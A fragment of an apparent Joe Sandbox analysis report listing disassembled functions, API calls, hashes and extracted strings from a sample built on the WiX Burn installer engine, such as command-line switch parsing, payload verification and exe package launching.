                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: e1a6192e2f76973b979749b83f693e73af4e3ba07503828c7c9807ba66288ac0
                                                                                                                                                                  • Instruction ID: 1e1aa1eca8f3ff1b531e8dc2a8938a1e24727b0453b1efda0f0e9c78c1521481
                                                                                                                                                                  • Opcode Fuzzy Hash: e1a6192e2f76973b979749b83f693e73af4e3ba07503828c7c9807ba66288ac0
                                                                                                                                                                  • Instruction Fuzzy Hash: 56F0FE706292046BD620DB78DD89B5533EDAF56725F544704E061DA1F0DB38E884AE92
                                                                                                                                                                  Function 0093DDD0 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?), ref: 0093DE0C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 51856fa0c34b6a24cd29d6e5948180f2ba02039830432b49acc86b580dac36e2
                                                                                                                                                                  • Instruction ID: 280808733f13c243ba533acb6a263204e21dc99ade56175cb32052e012f1b8a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 51856fa0c34b6a24cd29d6e5948180f2ba02039830432b49acc86b580dac36e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF039315102049FDB119F68D848F553BA8BF18375F058258E9198B2F2C734D951DE90

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 0093469C Relevance: 257.0, APIs: 76, Strings: 70, Instructions: 1457stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,0098E414,000000FF,00916C5C,00916C78,00916570,?,00000000,?), ref: 0093470C
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 0093472F
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00934752
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E458,000000FF), ref: 00934775
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E45C,000000FF), ref: 00934798
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 009347BB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E46C,000000FF), ref: 009347DE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 00934801
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,0098E47C,000000FF), ref: 00934824
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00934847
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0093486A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 00934898
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 00934970
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 009349AE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 009349EC
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 00934A2A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00934A68
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 00934A8B
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 00934AAE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 00934AD9
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,disablesystemrestore,000000FF), ref: 00934B0E
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 00934B3C
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 00934B9D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 00934BFE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 00934C51
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00934C99
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934CAB
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.log.mode), ref: 00934CBF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 00934D6C
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room), ref: 00934E5B
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,burn.clean.room,00000000), ref: 00934E69
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934E7B
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room), ref: 00934EFB
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component), ref: 00934F7F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00934F8D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00934F9F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.system.component), ref: 00934FAF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00935024
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 009350BA
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 009350FD
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 0093511D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00935141
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00935164
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00935187
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 009351AA
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 009351D0
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 009351F6
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00935224
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00935280
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 0093528E
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009352A0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 009352B0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors), ref: 00935325
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00935333
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935345
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.ancestors), ref: 00935355
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009353CD
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 009353DB
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009353ED
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 009353FD
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00935468
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00935476
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935488
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 0093549C
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00935527
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00935535
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00935547
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00935557
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen), ref: 009355D0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 009355DE
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 009355F0
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.splash.screen), ref: 00935600
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.), ref: 0093567F
                                                                                                                                                                  • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0093568D
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 0093569F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                  • String ID: -$Clean room command-line switch must be first argument on command-line.$Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to copy source process path.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.clean.room$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix4\wix4\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                                  • API String ID: 1657112622-287467567
                                                                                                                                                                  • Opcode ID: 26c4aeaf0432db84c2835fbe9d80b2655a666678c1bc821c1658b85049f13ce7
                                                                                                                                                                  • Instruction ID: c0117d6b0f8383fed89f5c36c6ed5aefef929bf83cfb93511e467a299b6432b8
                                                                                                                                                                  • Opcode Fuzzy Hash: 26c4aeaf0432db84c2835fbe9d80b2655a666678c1bc821c1658b85049f13ce7
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DB21771688711BBEB209B04CC4BF6673A9EB59B24F614A14F566EF2D0D6B4F880CF50
                                                                                                                                                                  Function 009218D8 Relevance: 179.7, APIs: 35, Strings: 67, Instructions: 1199COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0092278C
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,00917E53,00000000,Variable,00917E4F,00000000,00981D1C,00917E4B,00917E4B), ref: 00921A63
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,00917E5F), ref: 00921AD2
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 00921AEF
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 00921B15
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,00917E63,00000000,Path,00917E5F), ref: 00921BB3
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009222EE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$Compare$FreeHeap$AllocateProcess
                                                                                                                                                                  • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix4\wix4\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                                  • API String ID: 1229322287-2296787432
                                                                                                                                                                  • Opcode ID: a69fbcc4ce103e2be701d3c459092c66fbe5c77024a5609327184f3cc1b1516e
                                                                                                                                                                  • Instruction ID: a046f7b4e14692281e51285a06c94d9fd37c8e91925fa803c65ed10f1632f515
                                                                                                                                                                  • Opcode Fuzzy Hash: a69fbcc4ce103e2be701d3c459092c66fbe5c77024a5609327184f3cc1b1516e
                                                                                                                                                                  • Instruction Fuzzy Hash: BD828932A84225FBCB206B509C4AFAF3A6EDFD5B14F214064FA18BB2C5D6B4DD41D760
                                                                                                                                                                  Function 0091F788 Relevance: 79.5, APIs: 2, Strings: 43, Instructions: 733COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID: @Container is required for embedded payload.$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to add payload to container dictionary.$Failed to add payload to payloads dictionary.$Failed to allocate memory for layout payloads.$Failed to allocate memory for payload structs.$Failed to create dictionary for container payloads.$Failed to create dictionary for payloads.$Failed to find container: %ls$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$File size is required when verifying by hash for payload: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$There was no verification information for payload: %ls$d:\a\wix4\wix4\src\burn\engine\payload.cpp$embedded$external
                                                                                                                                                                  • API String ID: 1357844191-2408702627
                                                                                                                                                                  • Opcode ID: 971ec6ddcbbe1568fed5564735c8159b9b870a24120040a24a8b2fa78594bb6a
                                                                                                                                                                  • Instruction ID: e8954364e5cf9af49efb06a1294065f9b652cbc12c66a7c6acc35d732ce1e79d
                                                                                                                                                                  • Opcode Fuzzy Hash: 971ec6ddcbbe1568fed5564735c8159b9b870a24120040a24a8b2fa78594bb6a
                                                                                                                                                                  • Instruction Fuzzy Hash: F432163278430DBBDB21AA148C66FEF26B9DFC5B14F214038B615BB2C1E6B4E9818754
                                                                                                                                                                  Function 009424F7 Relevance: 75.8, APIs: 1, Strings: 49, Instructions: 825COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,00916DA2,00000000,00000000,8000FFFF,?), ref: 00942EFE
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to run exe with Burn protocol from path: %ls, xrefs: 00942DA3
                                                                                                                                                                  • "%ls", xrefs: 00942AE0
                                                                                                                                                                  • The QuietUninstallString executable path is not in a secure location: %ls, xrefs: 009427F2
                                                                                                                                                                  • Failed to get command-line argument for install., xrefs: 00942A0F
                                                                                                                                                                  • Failed to append the list of dependencies to ignore to the command line., xrefs: 00942BCE
                                                                                                                                                                  • Failed to run EXE process, xrefs: 00942E19
                                                                                                                                                                  • Failed to append the list of ancestors to the command line., xrefs: 00942C0D
                                                                                                                                                                  • Failed to append the relation type to the command line., xrefs: 00942B9B
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 009425A5, 00942641, 00942646, 0094265A, 0094268D, 009426E2, 009426ED, 00942745, 00942750, 00942798, 009427D8, 009428D6, 009428E1, 00942A65, 00942A70, 00942E55, 00942E5B, 00942E72
                                                                                                                                                                  • Failed to append norestart argument., xrefs: 00942B51
                                                                                                                                                                  • -%ls=ALL, xrefs: 00942BBA
                                                                                                                                                                  • Process returned error: 0x%x, xrefs: 00942E64
                                                                                                                                                                  • Failed to append argument from ARP., xrefs: 00942B68
                                                                                                                                                                  • QuietUninstallString is null., xrefs: 009426F5
                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 00942899, 00942F0C
                                                                                                                                                                  • -%ls, xrefs: 00942B87
                                                                                                                                                                  • Failed to parse QuietUninstallString: %ls., xrefs: 00942723
                                                                                                                                                                  • %ls %ls, xrefs: 00942D05
                                                                                                                                                                  • Failed to build executable path., xrefs: 0094267B, 0094287A
                                                                                                                                                                  • Failed to copy executable path., xrefs: 00942786
                                                                                                                                                                  • Failed to append %ls, xrefs: 00942C72
                                                                                                                                                                  • Failed to get parent directory for QuietUninstallString executable path: %ls, xrefs: 00942820
                                                                                                                                                                  • install, xrefs: 0094258D, 00942592
                                                                                                                                                                  • Failed to format argument string., xrefs: 00942CB6
                                                                                                                                                                  • uninstall, xrefs: 00942586
                                                                                                                                                                  • Failed to append the custom working directory to the exepackage command line., xrefs: 00942C3E
                                                                                                                                                                  • Failed to separate command-line arguments., xrefs: 00942AAC
                                                                                                                                                                  • Failed to get command-line argument for repair., xrefs: 009429E2
                                                                                                                                                                  • Failed to get command-line argument for uninstall., xrefs: 00942A95
                                                                                                                                                                  • Pseudo ExePackages must have a fully qualified target path., xrefs: 0094264C
                                                                                                                                                                  • Failed to verify the QuietUninstallString executable path is in a secure location: %ls, xrefs: 009427C6
                                                                                                                                                                  • Failed to query ArpEntry for %hs., xrefs: 00942593
                                                                                                                                                                  • QuietUninstallString must contain an executable path., xrefs: 00942758
                                                                                                                                                                  • Failed to format obfuscated argument string., xrefs: 00942CE5
                                                                                                                                                                  • Invalid Exe package action: %d., xrefs: 009428EF, 00942A7E
                                                                                                                                                                  • Failed to copy package arguments., xrefs: 0094293D
                                                                                                                                                                  • Failed to allocate obfuscated exe command., xrefs: 00942D19
                                                                                                                                                                  • Failed to allocate base command., xrefs: 00942AF4
                                                                                                                                                                  • WixBundleExecutePackageAction, xrefs: 009428B1, 00942F1D
                                                                                                                                                                  • burn.filehandle.self, xrefs: 00942C6D
                                                                                                                                                                  • Failed to evaluate executable package command-line condition., xrefs: 00942AC3
                                                                                                                                                                  • burn.related.chain.package, xrefs: 00942B7F
                                                                                                                                                                  • Failed to run netfx chainer: %ls, xrefs: 00942DE0
                                                                                                                                                                  • -norestart, xrefs: 00942B3D
                                                                                                                                                                  • Failed to get parent directory for pseudo-package: %ls, xrefs: 009426AC
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0094284E
                                                                                                                                                                  • burn.ancestors, xrefs: 00942BF4
                                                                                                                                                                  • -%ls=%ls, xrefs: 00942BF9
                                                                                                                                                                  • burn.ignoredependencies, xrefs: 00942BB2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: -%ls$ -%ls=%ls$ -%ls=ALL$ -norestart$"%ls"$%ls %ls$Failed to allocate base command.$Failed to allocate obfuscated exe command.$Failed to append %ls$Failed to append argument from ARP.$Failed to append norestart argument.$Failed to append the custom working directory to the exepackage command line.$Failed to append the list of ancestors to the command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the relation type to the command line.$Failed to build executable path.$Failed to copy executable path.$Failed to copy package arguments.$Failed to evaluate executable package command-line condition.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get cached path for package: %ls$Failed to get command-line argument for install.$Failed to get command-line argument for repair.$Failed to get command-line argument for uninstall.$Failed to get parent directory for QuietUninstallString executable path: %ls$Failed to get parent directory for pseudo-package: %ls$Failed to parse QuietUninstallString: %ls.$Failed to query ArpEntry for %hs.$Failed to run EXE process$Failed to run exe with Burn protocol from path: %ls$Failed to run netfx chainer: %ls$Failed to separate command-line arguments.$Failed to verify the QuietUninstallString executable path is in a secure location: %ls$Invalid Exe package action: %d.$Process returned error: 0x%x$Pseudo ExePackages must have a fully qualified target path.$QuietUninstallString is null.$QuietUninstallString must contain an executable path.$The QuietUninstallString executable path is not in a secure location: %ls$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$burn.ancestors$burn.filehandle.self$burn.ignoredependencies$burn.related.chain.package$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$install$uninstall
                                                                                                                                                                  • API String ID: 2962429428-2088893599
                                                                                                                                                                  • Opcode ID: ade3eb3e63e9e67899ab80190f4a451fe13897afec251783a1e422b8382038b5
                                                                                                                                                                  • Instruction ID: 82931328ad83ccca44bcb7194aefd3ffb28dc5605b14509798f12a03b235aefa
                                                                                                                                                                  • Opcode Fuzzy Hash: ade3eb3e63e9e67899ab80190f4a451fe13897afec251783a1e422b8382038b5
                                                                                                                                                                  • Instruction Fuzzy Hash: F142A131E80319BBEF229F94CC4AFEE7A78BB44B14F514151FA04BA1D1D7B19E909B90
                                                                                                                                                                  Function 0096DA1F Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 398COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0096DAB7
